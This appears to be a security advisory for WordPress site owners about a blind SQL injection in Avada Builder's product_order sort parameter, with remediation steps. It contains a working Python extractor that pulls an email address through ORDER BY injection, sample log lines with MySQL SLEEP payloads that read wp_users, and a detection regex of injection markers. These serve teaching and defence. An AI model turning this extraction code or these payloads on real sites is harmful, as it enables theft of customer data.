If your WordPress website ever ran an online store — even one you shut down months ago — a hacker right now could be quietly reading every customer record you've ever collected, without needing a username or password to get in.
Who's at Risk — and How Many Sites Are We Talking About?
Avada is the best-selling WordPress theme of all time, and its companion Avada Builder plugin powers an estimated 900,000+ active websites worldwide. A significant portion of those sites used WooCommerce — WordPress's dominant e-commerce engine — at some point to sell products online. That's important, because this vulnerability has an unusual trigger: it activates specifically on sites where WooCommerce was previously installed and then deactivated.
Think about what that means in practice. A small business owner who tested an online store idea, decided it wasn't for them, and turned WooCommerce off — believing they'd cleaned things up — may now be sitting on an open door they don't know exists. Customer names, email addresses, hashed passwords, shipping addresses, and order histories could all be within reach of anyone who knows where to look. Every version of Avada Builder up to and including 3.15.1 is affected.
What an Attacker Actually Does — No Jargon
Here's the simple version of how this attack works. Your WordPress site, like almost every website, constantly asks its database questions: "Show me the products in this category," or "What order did this customer place last week?" Those questions are written in a language databases understand, and they're supposed to be locked down so only trusted parts of your website can send them.
The Avada Builder plugin has a flaw in how it handles a specific behind-the-scenes instruction called product_order, a request parameter originally meant to choose how WooCommerce products are sorted. Even after WooCommerce is gone, that parameter is still accepted, and whatever an attacker puts into it ends up inside the database query itself, essentially whispering instructions directly into your database's ear. Because the attack is "time-based," the attacker doesn't get data back directly. Instead, they make the database pause for a few seconds only if a guess about the data is true (for example, "is the first letter of the admin's email address an 'a'?"), then measure how long the site takes to respond. Slow response? The guess was right. It's painstaking, but automated tools ask thousands of such questions a minute and can pull whole tables out of a database this way.
The scariest part: none of this requires the attacker to have an account on your site. They don't need to be a subscriber, an editor, or an administrator. They just need to find your site and send a crafted web request. That's what "unauthenticated" means in the security world — the door has no lock at all.
The Technical Anchor
Security researchers will want to note: the vulnerability is classified as a time-based blind SQL injection via unsanitized user input in the product_order parameter, caused by insufficient escaping and a lack of prepared statements in the plugin's query construction layer. It carries a CVSS score of 7.5 (HIGH) under CVE identifier CVE-2026-4798. One caveat for anyone reviewing or writing the fix: product_order is a sort parameter, and a sort column or direction cannot be bound as a prepared-statement placeholder, so escaping alone does not close this class of bug; the value has to be checked against an allowlist of permitted sort expressions (WordPress ships sanitize_sql_orderby() for this purpose). The attack surface is exposed only when WooCommerce's database tables remain in place after deactivation, which is the normal state of affairs: deactivating a WordPress plugin never removes its tables, and WooCommerce drops them on uninstall only when the site defines the WC_REMOVE_ALL_DATA constant as true in wp-config.php.
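To make the mechanics described above concrete, here is an added example written for this article. It is not code from Avada Builder, WordPress or WooCommerce: the table names, the sample rows and the product query are constructed, and the only detail taken from the advisory is that a sort parameter named product_order reaches the query. It uses SQLite from Python so it runs offline. The vulnerable function pastes the sort parameter into ORDER BY; the attacker-side function then recovers a hidden email address one character at a time by asking yes/no questions through that parameter. Because SQLite has no SLEEP(), the example reads each answer from which ordering comes back instead of from the response time; on MySQL the THEN branch would be SLEEP(3) and the attacker would time the request, which is the "time-based" variant the advisory describes. The hardened function maps the parameter through an allowlist, the standard fix for a sort column since it cannot be bound as a placeholder.

```python
"""Added example: ORDER BY (sort-parameter) injection and the allowlist fix.

Illustrative code written for this article, not code from Avada Builder.
Table names, column names and sample data are constructed (hypothetical).
"""
import sqlite3

SAMPLE_EMAIL = "owner@example.com"  # constructed secret the attacker will recover


def make_sample_db() -> sqlite3.Connection:
    """Build an in-memory stand-in for a WordPress database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'Zebra mug', 5.00), (2, 'Apple tee', 20.00),
                                    (3, 'Mango cap', 12.00);
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT);
    """)
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (SAMPLE_EMAIL,))
    return conn


def vulnerable_query(conn, product_order: str) -> list:
    """Vulnerable pattern: the sort parameter is pasted straight into ORDER BY.
    Escaping does not help: an ORDER BY target is an expression, not a string
    literal, so there is nothing to escape and nothing to bind as a parameter."""
    sql = "SELECT name FROM products ORDER BY " + product_order  # injection point
    return [row[0] for row in conn.execute(sql)]


# Hardened pattern: the request may only choose a key; the server owns the SQL.
ALLOWED_ORDER = {"title": "name", "price": "price", "newest": "id DESC"}


def resolve_order_column(product_order: str) -> str:
    """Map a user-supplied sort key to a fixed clause; reject everything else."""
    try:
        return ALLOWED_ORDER[product_order]
    except KeyError:
        raise ValueError("unsupported sort key: %r" % product_order) from None


def safe_query(conn, product_order: str) -> list:
    sql = "SELECT name FROM products ORDER BY " + resolve_order_column(product_order)
    return [row[0] for row in conn.execute(sql)]


# ---- attacker side ---------------------------------------------------------
def _oracle(conn, condition: str, true_order: list) -> bool:
    """One yes/no question: the result ordering leaks whether `condition` holds.
    On MySQL the THEN branch would be SLEEP(3) and the attacker would measure
    the response time instead of comparing orderings."""
    payload = "CASE WHEN (%s) THEN name ELSE price END" % condition
    return vulnerable_query(conn, payload) == true_order


def extract_via_order_injection(conn, max_len: int = 64) -> str:
    """Recover wp_users.user_email for ID=1 one character at a time, using a
    binary search over the character's code point (about 7 requests per char)."""
    true_order = vulnerable_query(conn, "name")  # attacker first learns both orderings
    recovered = ""
    for pos in range(1, max_len + 1):
        target = ("unicode(substr((SELECT user_email FROM wp_users WHERE ID=1), %d, 1))"
                  % pos)
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if _oracle(conn, "%s > %d" % (target, mid), true_order):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr past the end yields NULL: every test is false, stop
            break
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_sample_db()
    print("leaked via ORDER BY injection:", extract_via_order_injection(db))
    print("allowlisted sort (price):     ", safe_query(db, "price"))
```

Run as a script it prints the recovered address and the legitimate price ordering. The interesting part for defenders is that the second function never sees the attacker's expression: the request can only pick one of three keys, and anything else raises before a query is built. The same idea applies to the direction (ASC/DESC) and to any other identifier a request is allowed to influence.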
Has Anyone Been Attacked Yet?
As of publication, there is no confirmed active exploitation in the wild, and no known victim campaigns have been publicly reported. However, the security community's experience with high-profile WordPress plugin vulnerabilities is consistent: once a CVE is public, automated scanners begin probing for vulnerable sites within 24 to 72 hours. The combination of a massive install base, an unauthenticated attack vector, and the "legacy store" trigger makes this a high-priority target for opportunistic attackers running mass-scanning campaigns.
The vulnerability was discovered through responsible disclosure processes. Avada's development team has been notified, and a patched version is expected. Site owners should not wait for attackers to catch up.
What You Need to Do Right Now — 3 Steps
- Update Avada Builder to version 3.15.2 or later as soon as it is available to you. Log into your WordPress dashboard, go to Plugins → Installed Plugins, and check for an update to Avada Builder. If no update is offered yet, check the Patchstack advisory and the Avada changelog on ThemeForest, and install the release through the theme's own updater or manually. Do not delay this step: patching is your single most effective defense, and it is the only step that fixes the code itself.
- Check whether WooCommerce's database tables are still present. Deactivating a WordPress plugin never removes its tables, so if you deactivated WooCommerce long ago, its tables almost certainly still exist. Log into your hosting control panel, open phpMyAdmin, and look for tables whose names begin with wp_wc_ or wp_woocommerce_ (if your site uses a custom table prefix, substitute it for wp_). If you have no plans to use WooCommerce again, take a full database backup, then uninstall the plugin rather than just deactivating it. Note that WooCommerce only drops its tables on uninstall when wp-config.php defines the constant WC_REMOVE_ALL_DATA as true; otherwise drop the leftover tables yourself in phpMyAdmin or with a database-cleanup plugin that explicitly supports removing orphaned tables. This removes the condition this exploit depends on, but it is a stopgap, not a substitute for the patch. If you might reopen the store, keep the tables (they hold your order history) and rely on the update instead.
- Audit your access logs and database logs for signs of probing. Time-based SQL injection leaves a recognizable fingerprint: bursts of requests from one source to the same URL parameter, many of them taking several seconds longer than normal, with SQL fragments such as SLEEP(, CASE WHEN or SELECT in the parameter value. Standard access logs do not record response time, so ask your hosting provider for logs that include request timing (or for the last two weeks of raw access logs, and search them for the parameter name), or install a WordPress security plugin such as Wordfence (free tier) or Sucuri to scan for indicators of compromise. If you find evidence of probing, assume the data was exposed and notify affected customers in accordance with the data breach rules that apply to you (GDPR in Europe, state-level laws in the US).
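The log fingerprint described in the last step can be checked with a short script. The following is an added example written for this article, not a tool from Wordfence, Sucuri, WordPress or any hosting provider. It assumes nginx-style access logs with the request time in seconds appended as the last field (the default combined format does not include it) and that the parameter arrives as product_order in the query string; the advisory does not say which endpoint or HTTP method the plugin reads it from, so the URL shape is an assumption. The log lines are constructed for the demonstration and include one legitimate sort request, four probes from a single client (one of them the fast "false branch" probe that only the syntax check catches), and a slow but harmless file download that must not be flagged.

```python
"""Added example: flagging time-based SQL injection probes in an access log.

Written for this article; not a tool from Wordfence, Sucuri, WordPress or any host.
Assumptions: nginx-style combined log with $request_time (seconds) appended as the
last field, and the parameter arriving as product_order in the query string. The
log lines below are constructed for the demonstration.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
198.51.100.4 - - [05/Mar/2026:09:58:10 +0000] "GET /shop/?product_order=price HTTP/1.1" 200 18211 0.094
203.0.113.7 - - [05/Mar/2026:10:14:01 +0000] "GET /shop/?product_order=title HTTP/1.1" 200 18211 0.081
203.0.113.7 - - [05/Mar/2026:10:14:02 +0000] "GET /shop/?product_order=(SELECT%20CASE%20WHEN%20(1%3D1)%20THEN%20SLEEP(5)%20ELSE%200%20END) HTTP/1.1" 200 18211 5.112
203.0.113.7 - - [05/Mar/2026:10:14:08 +0000] "GET /shop/?product_order=(SELECT%20CASE%20WHEN%20(1%3D2)%20THEN%20SLEEP(5)%20ELSE%200%20END) HTTP/1.1" 200 18211 0.088
203.0.113.7 - - [05/Mar/2026:10:14:09 +0000] "GET /shop/?product_order=(SELECT%20CASE%20WHEN%20(ORD(MID((SELECT%20user_email%20FROM%20wp_users%20LIMIT%201),1,1))%3E64)%20THEN%20SLEEP(5)%20ELSE%200%20END) HTTP/1.1" 200 18211 5.097
203.0.113.7 - - [05/Mar/2026:10:14:15 +0000] "GET /shop/?product_order=(SELECT%20CASE%20WHEN%20(ORD(MID((SELECT%20user_email%20FROM%20wp_users%20LIMIT%201),1,1))%3E96)%20THEN%20SLEEP(5)%20ELSE%200%20END) HTTP/1.1" 200 18211 5.104
198.51.100.9 - - [05/Mar/2026:10:20:44 +0000] "GET /wp-content/uploads/big.zip HTTP/1.1" 200 52428800 6.500
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<rt>[\d.]+)$'
)

# SQL fragments that have no business in a sort-key value. Time-based payloads
# almost always pair a conditional (CASE WHEN) with a delay function (SLEEP etc.).
SQL_MARKERS = re.compile(
    r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR|SELECT|UNION|CASE\s+WHEN|ORD|ASCII|MID|SUBSTR(?:ING)?)\b",
    re.IGNORECASE,
)


def parse_line(line: str):
    """Parse one log line; returns None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    # parse_qs percent-decodes values, so SQL hidden behind %20/%3D is visible here
    query = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    rec["params"] = {k: v[0] for k, v in query.items()}
    return rec


def find_sqli_probes(log_text: str, watch_params=("product_order",),
                     slow_s: float = 3.0, min_hits: int = 2) -> dict:
    """Group suspicious requests by (client IP, parameter).

    A request counts as suspicious when the watched parameter carries SQL syntax
    or when the request was slow. Slow requests that lack the parameter (large
    downloads, backups) are ignored, which keeps ordinary slowness out of the
    result; the fast "false branch" probes are still caught by the syntax check.
    Only sources with at least min_hits suspicious requests are reported.
    """
    hits = defaultdict(lambda: {"count": 0, "slow": 0, "sql_syntax": 0, "samples": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for param in watch_params:
            value = rec["params"].get(param)
            if value is None:
                continue
            has_sql = SQL_MARKERS.search(value) is not None
            is_slow = rec["rt"] >= slow_s
            if not (has_sql or is_slow):
                continue
            entry = hits[(rec["ip"], param)]
            entry["count"] += 1
            entry["slow"] += is_slow
            entry["sql_syntax"] += has_sql
            if len(entry["samples"]) < 3:
                entry["samples"].append(value[:60])
    return {k: v for k, v in hits.items() if v["count"] >= min_hits}


if __name__ == "__main__":
    for (ip, param), info in find_sqli_probes(SAMPLE_LOG).items():
        print(f"{ip} -> {param}: {info['count']} suspicious requests "
              f"({info['slow']} slow, {info['sql_syntax']} with SQL syntax)")
        for sample in info["samples"]:
            print("   ", sample)
```

Point the script at a real log by replacing SAMPLE_LOG with the file contents and adjusting LOG_RE to your server's format. The two signals are deliberately combined: timing alone misses the half of a binary search whose condition is false (those requests return at normal speed), and syntax matching alone is easy to obfuscate, but an attacker extracting data has to send many requests that trip at least one of them.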
CVE: CVE-2026-4798 | CVSS: 7.5 HIGH | Affected versions: Avada Builder ≤ 3.15.1 | Exploitation status: No confirmed active exploitation at time of publication.